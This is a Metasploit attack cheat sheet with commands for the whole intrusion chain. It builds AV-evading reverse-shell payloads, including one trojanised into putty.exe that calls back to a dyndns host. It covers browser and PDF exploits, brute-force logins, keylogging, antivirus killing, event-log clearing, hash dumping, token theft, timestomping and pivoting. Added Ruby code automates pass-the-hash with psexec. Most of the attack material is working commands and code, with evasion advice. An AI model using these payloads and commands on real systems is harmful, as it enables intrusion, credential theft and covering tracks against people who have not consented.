————————————————————–| Common Tasks and Maintenance |
================ Basics
msfupdate
msfconsole
search (some exploit type)
db_status
workspace -h
hosts -h
sessions -h
services -h
db_import
db_nmap
show options
loot -h
creds
search value
======================= MSF thru a SOCKS proxy
Make MSF itself a SOCKS server (e.g. to push other tools through an MSF pivot route):
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run
(then add "socks4 127.0.0.1 1080" to /etc/proxychains.conf and launch the tools with proxychains; on current Metasploit the module is auxiliary/server/socks_proxy with a VERSION option of 4a or 5)
Run MSF modules thru an external proxy
Modules that honour the Proxies option send their traffic through it. For SOCKS v4 do:
set Proxies socks4:192.168.1.2:1080
and for HTTP CONNECT:
set Proxies HTTP:192.168.1.2:8080
======================= MSF Create PostgreSQL DB (Not required on Kali: run msfdb init there instead)
sudo apt-get install postgresql libpgsql-ruby libpq-dev
sudo gem install pg
Become the system postgres user:
sudo su postgres
Create a database user (-D no createdb, -P prompt for a password, -R no createrole, -S not a superuser):
createuser -D -P -R -S username
Enter password
Create the database:
createdb --owner=username metasploit4
exit
Configure Metasploit
Start the framework, then enter the following commands:
msf > db_connect username:[password]@127.0.0.1:5432/metasploit4
or, where the distro ships a database.yml (BackBox path shown):
msf > db_connect -y /opt/backbox/config/database.yml
msf > workspace -a MyProject
(db_status confirms the connection)
Enable the database on startup (the rc file holds the DB password in clear text, so make it readable only by your user):
cat > ~/.msf4/msfconsole.rc <<'EOF'
db_connect username:[password]@127.0.0.1:5432/metasploit4
EOF
====================== Create your own MSF Module
(save as ~/.msf4/modules/auxiliary/scanner/misc/my_tcp_scan.rb, run reload_all in msfconsole, then use auxiliary/scanner/misc/my_tcp_scan, set RHOSTS and run)

```ruby
# Modern module skeleton: no require 'msf/core', class is MetasploitModule,
# no 'Version' key and no self.class argument to register_options.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp  # connect/disconnect/sock/rport helpers
  include Msf::Auxiliary::Scanner    # RHOSTS/THREADS handling, run_host per target
  include Msf::Auxiliary::Report     # report_service into the database

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => 'My custom TCP scan',
        'Description' => 'My quick scanner',
        'Author'      => ['Your name here'],
        'License'     => MSF_LICENSE
      )
    )

    register_options(
      [
        Opt::RPORT(12345)
      ]
    )
  end

  # Called once per host in RHOSTS (in parallel, up to THREADS).
  def run_host(ip)
    connect
    sock.put("HELLO SERVER\n")
    # Wait at most 5 seconds for up to 1024 bytes; a bare recv would block
    # the scanner thread forever on a service that never answers.
    data = sock.get_once(1024, 5)
    if data
      print_good("#{ip}:#{rport} - Received: #{data.strip}")
      report_service(host: ip, port: rport, proto: 'tcp', info: data.strip)
    else
      print_status("#{ip}:#{rport} - No response")
    end
  rescue ::Rex::ConnectionError, ::EOFError, ::Timeout::Error => e
    vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
  ensure
    disconnect
  end
end
```
————————————————————–| Scan & Exploit Stuff |
======================= XMAS Tree Scan
msfcli auxiliary/scanner/portscan/xmas A   (advanced options)
msfcli auxiliary/scanner/portscan/xmas S   (summary)
msfcli auxiliary/scanner/portscan/xmas O   (options)
(msfcli was removed from Metasploit in 2015; the one-liner equivalent is msfconsole -q -x "use auxiliary/scanner/portscan/xmas; show options; exit")
====================== Enumerate the remote network
run netenum
run netenum -ps -r 192.168.0.0/24
run post/windows/gather/arp_scanner RHOSTS=192.168.0.0/24 <<<<<<<<< Good for firewalled hosts (host firewalls do not block ARP), but enterprise switches with port security may shut the port down when they see the burst of ARP lookups
====================== Static Payloads
(msfpayload and msfencode were removed in 2015; msfvenom does both jobs, e.g. the last build below is now
msfvenom -p windows/shell_reverse_tcp LHOST=<my IP> LPORT=<my port> -e x86/shikata_ga_nai -i 6 -x Good.exe -k -f exe -o Bad.exe)
Create EXE Stager
msfpayload windows/meterpreter/bind_tcp EXITFUNC=process LPORT=64254 R | msfencode -e x86/shikata_ga_nai -c 13 -t exe -o Bad.exe
More encoder passes (-c), or injecting into a legitimate binary with -x/-k, used to cut the number of AV matches significantly; shikata_ga_nai output is well signatured today. Do not test samples on VirusTotal: uploads are shared with the vendors and burn the payload.
./msfpayload windows/meterpreter/reverse_https LHOST=symantec20.dyndns.org R | ./msfencode -t exe -x ../downloads/putty.exe -k -o newputty.exe -e x86/shikata_ga_nai -c 6
( OR )
./msfpayload windows/shell_reverse_tcp LHOST=<my IP> LPORT=<my port> R | ./msfencode -e x86/shikata_ga_nai -x Good.exe -c 6 -k -o Bad.exe
sudo ./msfcli multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=<my IP> LPORT=<my port> E <<<<<<<<< or use the handler under "All About Shells"
======================= Hiding MSF Shell Payload
(Windows tip for running CMD while evading IDS systems)
execute -c -H -f cmd -a "/k" -i   <<< -c channelized I/O, -H hidden window, -f program, -a arguments, -i interact
(this suppresses the full CMD banner in the packets, which usually trips a signature)
======================= Brute Force Everything
(mind the account lockout policy before feeding a long password list; STOP_ON_SUCCESS true stops at the first valid pair and THREADS sets the parallelism)
(MySQL)
use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS tar.get.ip.address
set USER_FILE /my/username/list
set PASS_FILE /my/password/list
run
(PostgreSQL)
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS tar.get.ip.address
set USER_FILE /my/username/list
set PASS_FILE /my/password/list
run
(Tomcat manager)
use auxiliary/scanner/http/tomcat_mgr_login
show options
set RHOSTS tar.get.ip.address
set USER_FILE /my/username/list
set PASS_FILE /my/password/list
run
======================= Browser AutoPWN
msfconsole
search autopwn
use auxiliary/server/browser_autopwn   <<< superseded by auxiliary/server/browser_autopwn2 in current Metasploit
set payload windows/meterpreter/reverse_tcp
show options
set LHOST my.ip.add.ress
set URIPATH "filetypes"
exploit
======================= IE Browser Direct Attack
sudo ./msfconsole
use exploit/windows/browser/ie_cgenericelement_uaf <<<<<<<<< Targeted attack for IE (CGenericElement use-after-free, MS13-038)
set URIPATH /plugins <<<<<<<<<<<<<<<<<<<< give it a plausible-looking URI
set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false <<<<<<<<<<< keep serving after the first session
set LHOST my.ip.address
exploit -j
======================= PDF Exploit
msfconsole
search pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evil-Document.pdf
set INFILENAME Document.pdf   <<< existing, legitimate PDF the payload is embedded in
exploit   <<< set PAYLOAD/LHOST too, and start a matching multi/handler before the file is opened
======================= SMB Exploit Scan
db_nmap -Pn -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [target networks]
======================= SMB Conficker Scan
db_nmap --script p2p-conficker,smb-os-discovery,smb-check-vulns -p- --script-args checkall=1,safe=1 -T4 [target networks]
(smb-check-vulns was dropped in Nmap 7; use the smb-vuln-* scripts instead, e.g. --script smb-vuln-ms08-067,smb-vuln-conficker)
————————————————————–| Post Exploitation Stuff |
======================= Key Logging
keyscan_start
keyscan_dump
keyscan_stop
del my_exploit.exe   <<< remove the dropped stager
clearev              <<< clears the Application, System and Security event logs (itself a loud indicator)
ps (check processes)
kill process_id
steal_token process_id
====================== All About Shells
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set ExitOnSession false <<<<<<<<<<< Allows us to have multiple sessions
set LHOST my.ip.address
set LPORT 7777
exploit -j
AFTER SHELLS
sysinfo < == Show Windows info
getuid < == Show Current Username
getsystem <== escalate to system level access
getuid <== Verify we have system
rev2self <=== Revert to first access level
getuid
====================== Kill AV
getsystem
run killav
====================== Check for VM Instance
getsystem
run post/windows/gather/checkvm <== Check if Im a VM instance
====================== Steal Hash
getsystem
run post/windows/gather/hashdump
==================== Enumerate Remote System
meterpreter > run getcountermeasure <<< Shows what protections are in place
meterpreter > run winenum <<< Shows All the Windows Info You Can Think Of
meterpreter > run post/windows/gather/enum_applications <<<< Show Installed Apps
meterpreter > run post/windows/gather/enum_logged_on_users <<<< Show Logged In Users
meterpreter > run post/windows/gather/usb_history <<<< USB Device History
meterpreter > run post/windows/gather/enum_shares <<<< Shows Shares
meterpreter > run post/windows/gather/enum_snmp <<<< Show SNMP Info
meterpreter > reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
====================== Steal Tokens
getsystem
load incognito
list_tokens -u <<<<< show user tokens available on the box
list_tokens -g <<<<< show group tokens available on the box
impersonate_token HOSTNAME\\Administrator
getuid
<<<<<<<<<<<<<<<<< Think about service accounts as targets: services run as SYSTEM
<<<<<<<<<<<<<<<<<< Then take a Domain Admin token
<<<<<<<<<<<<<<<<<<< Only a "Delegation Token" (left by interactive, RDP and service logons) can be used to authenticate to other hosts; an "Impersonation Token" (network logons) only works on the local box
====================== Prove Access (for CTF Games)
upload my.name.txt c:\\
timestomp C:\\my.name.txt -v
timestomp C:\\my.name.txt -m "01/01/0001 01:01:01"   <<< format MM/DD/YYYY HH24:MI:SS; a year-0001 stamp is an obvious tell, -f <file> copies the times of an existing file instead
timestomp C:\\my.name.txt -v
(timestomp only rewrites the $STANDARD_INFORMATION times; the $FILE_NAME times in the MFT record are untouched and give the change away to forensics)
====================== Setup a Pivot thru Remote System
[CTRL-z] (y) <<<<<<< Background Session
msf exploit(handler)> back <<<<<<<<<<<< Get back to main MSF prompt
msf>
sessions -l <<<<<< find the session on the host you want to pivot thru; note the subnet behind it and the session #
Now set up the pivot with a route add (first argument is the target subnet reachable from that host, not the pivot's own IP)
route print
route add 192.168.0.0 255.255.255.0 session.#
route print
(run autoroute -s 192.168.0.0/24 from inside the session does the same)
====================== Now scan thru my Pivot
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.0.0/24
set THREADS 10   <<< no "=": set THREADS = 10 would store "= 10"
run
================= Reheat the Hash
Once you have a valid NTLM hash, pass it straight to psexec (no cracking needed) to collect more shells:
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.0.5   <<< RHOSTS on current Metasploit; set SMBDomain for domain accounts
set LHOST 192.168.0.6
set SMBUser SomeUserName
set SMBPass 00000000000000000000000000000000:E5810F3C99AE2ABB2232ED8458A61309   <<< LM:NT as dumped; the 32 zeros (or aad3b435b51404eeaad3b435b51404ee) stand in for the absent LM half
exploit
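Added example (not from the original page or the Metasploit project) tying the "Steal Hash" and "Reheat the Hash" sections together: a Ruby script that parses hashdump output into the LM:NT value psexec's SMBPass expects and writes an msfconsole resource script that tries each usable hash. The hashdump lines, account names and RIDs are constructed sample data; the script drops malformed lines and accounts whose NT hash is the well-known empty-password hash, since those would only burn logon attempts.

```ruby
# Constructed sample in pwdump format (user:rid:LM:NT:::). The second NT
# hash is the one quoted on the page; jdoe has no LM half at all.
SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1105:00000000000000000000000000000000:E5810F3C99AE2ABB2232ED8458A61309:::
  jdoe:1106::E5810F3C99AE2ABB2232ED8458A61309:::
  Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
  not a hashdump line
DUMP

EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'  # LM hash of the empty string
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'  # NT hash of the empty string
HEX32    = /\A\h{32}\z/

Cred = Struct.new(:user, :rid, :lm, :nt) do
  # psexec takes "LM:NT"; when LM storage is disabled the LM half is the
  # empty-string hash, which Metasploit treats like the page's 32 zeros.
  def smbpass
    "#{lm}:#{nt}"
  end

  def empty_password?
    nt == EMPTY_NT
  end
end

# Parse hashdump text. Lines without a 32-hex-char NT hash (junk, or the
# "NO PASSWORD***" placeholders) are skipped; a missing/invalid LM half
# is replaced with EMPTY_LM so the SMBPass stays well-formed.
def parse_hashdump(text)
  text.each_line.map do |line|
    user, rid, lm, nt = line.strip.split(':')
    next unless user && nt && HEX32.match?(nt)
    lm = EMPTY_LM unless lm && HEX32.match?(lm)
    Cred.new(user, rid.to_i, lm.downcase, nt.downcase)
  end.compact
end

# Emit an msfconsole resource script (run with: msfconsole -r pth.rc) that
# tries every credential with a real password as a background job.
# Option names follow current Metasploit (RHOSTS); older builds use RHOST.
def psexec_rc(creds, rhost:, lhost:, lport: 4444, domain: '.')
  lines = [
    'use exploit/windows/smb/psexec',
    'set PAYLOAD windows/meterpreter/reverse_tcp',
    "set RHOSTS #{rhost}",
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    "set SMBDomain #{domain}"
  ]
  creds.reject(&:empty_password?).each do |c|
    lines << "set SMBUser #{c.user}" << "set SMBPass #{c.smbpass}" << 'exploit -j'
  end
  lines.join("\n") + "\n"
end

if __FILE__ == $PROGRAM_NAME
  creds = parse_hashdump(SAMPLE_HASHDUMP)
  File.write('pth.rc', psexec_rc(creds, rhost: '192.168.0.5', lhost: '192.168.0.6'))
  puts File.read('pth.rc')
end
```

Each `exploit -j` reuses the module's datastore, so only SMBUser/SMBPass change between attempts; one handler on LHOST:LPORT catches every session.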